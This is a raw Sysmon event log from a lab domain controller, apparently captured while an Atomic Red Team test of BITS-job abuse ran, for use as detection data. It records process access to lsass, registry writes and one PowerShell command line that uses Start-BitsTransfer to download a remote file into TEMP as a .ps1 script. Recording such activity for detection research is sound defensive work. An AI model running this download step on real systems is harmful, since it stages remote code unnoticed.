16:33:11.900{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061786Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.900{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001061785Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-CreatePipe2021-03-30 16:33:11.884{7F8C56E7-52C7-6063-4201-00000000AF01}4640\PSHost.132615955915902210.4640.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001061784Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.869{7F8C56E7-52C7-6063-4201-00000000AF01}4640ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zcgh5pjl.wf1.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061783Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.869{7F8C56E7-52C7-6063-4201-00000000AF01}4640ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_plcr1bvu.2nn.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001061782Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.853{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_plcr1bvu.2nn.ps12021-03-30 16:33:11.853 10341000x80000000000000001061781Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.619{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061780Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061779Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA71EB3F13) 10341000x80000000000000001061778Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061777Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061776Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061775Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061774Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4E4F-6063-5500-00000000AF01}38244020C:\Windows\system32\csrss.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061773Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc612994(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6127fb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc69b92c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60aa81(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd0db2d3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc5d0029(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc633a9b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61593b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60665b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc642cfe(wow64) 154100x80000000000000001061772Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.590{7F8C56E7-52C7-6063-4201-00000000AF01}4640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\bitsadmin2_flag.ps1} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001061771Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-03-30 16:33:11.072 11241100x80000000000000001061770Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.587{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-03-30 16:33:11.072 23542300x80000000000000001061769Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.556{7F8C56E7-4F87-6063-C900-00000000AF01}5652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=B5FF92CDE755D2C5365C39688CDFAB71,SHA256=8A6A0406D7BD5FEDF7ABC96D75B4FCBA820EB2FDF19B1E8435E11DBB9E6E36D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061768Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.509{7F8C56E7-4E3C-6063-1600-00000000AF01}1280NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BITCD9E.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001061767Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:33:11.275{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000000) 13241300x80000000000000001061766Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:33:11.275{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0011cdcc) 13241300x80000000000000001061765Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:33:11.275{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d72577-0x2e32d794) 13241300x80000000000000001061764Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:33:11.275{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7257f-0x8ff73f94) 13241300x80000000000000001061763Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:33:11.275{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d72587-0xf1bba794) 23542300x80000000000000001061762Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.228{7F8C56E7-4E3C-6063-1600-00000000AF01}1280NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BITCD9E.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061761Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.228{7F8C56E7-4E3C-6063-1600-00000000AF01}12801804C:\Windows\system32\svchost.exe{7F8C56E7-52C7-6063-4101-00000000AF01}2956C:\Windows\system32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x80000000000000001061760Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.212{7F8C56E7-4E3C-6063-1000-00000000AF01}1001120C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001061759Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.212{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061758Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.212{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1ecba|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+1794e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001061757Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.212{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEA5C02C0EF4012986D181E05EC3E3EC,SHA256=2FAC240BB60BC22CE88CE0332D19084CEB2076CE7CD255841779DFEA1EA72E00,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061756Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.197{7F8C56E7-4E3B-6063-0B00-00000000AF01}628668C:\Windows\system32\lsass.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001061755Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 